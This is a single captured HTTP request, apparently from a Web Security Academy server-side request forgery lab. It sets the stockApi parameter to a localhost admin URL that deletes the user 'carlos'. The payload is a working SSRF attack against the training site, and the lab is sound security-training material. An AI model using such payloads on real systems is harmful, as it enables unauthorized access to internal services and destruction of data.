POST /product/stock HTTP/2
Host: 0a4d0064041bcf4680e41ce400480024.web-security-academy.net
Cookie: session=Zwd1qZOikheOQphyQrU0avhA5ou0Yk6W; session=SkGCEagTddBAtxbMgtXlpCwx1bDTkVoD
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a4d0064041bcf4680e41ce400480024.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://0a4d0064041bcf4680e41ce400480024.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

stockApi=http://localhost/admin/delete?username=carlos
